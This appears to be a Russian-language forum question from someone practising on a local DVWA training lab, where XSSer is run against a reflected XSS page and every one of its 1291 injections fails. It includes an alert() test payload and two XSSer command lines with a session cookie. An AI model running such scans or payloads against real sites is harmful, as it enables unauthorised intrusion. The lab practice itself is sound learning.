Поиск XSS вместе с XSSer
Запускаю утилиту XXSer для проверки сайта на XSS уязвимость (DVWA). Сайт уязвим. Если в единственное поле отправить
<script>alert(1)</script>
то скрипт честно отработает. Далее запускаю XSSer, например пробую такие команды
python3 xsser -u 'http://192.168.1.2' -g '/vulnerabilities/xss_r/?name=XSS' --cookie='PHPSESSID=g8qpr8h01b9slfice62blcthd;security=low' -s --payload="<script>alert(XSS)</script>" --save
либо так - через перебор атак XSSer'a
python3 xsser -u 'http://192.168.1.2' -g '/vulnerabilities/xss_r/?name=XSS' --cookie='PHPSESSID=g8qpr8h01b9slfice62blcthd;security=low' --auto --save
XSSer перебирает все 1291 варианта для атаки и пишет отчет
===========================================================================
[*] Final Results:
===========================================================================
- Injections: 1291
- Failed: 1291
- Successful: 0
- Accur: 0.0 %
Ожидания были таковы: XSSer найдет целую кучу xss'ok и предложит варианты для их эксплуатации. В чем я ошибся?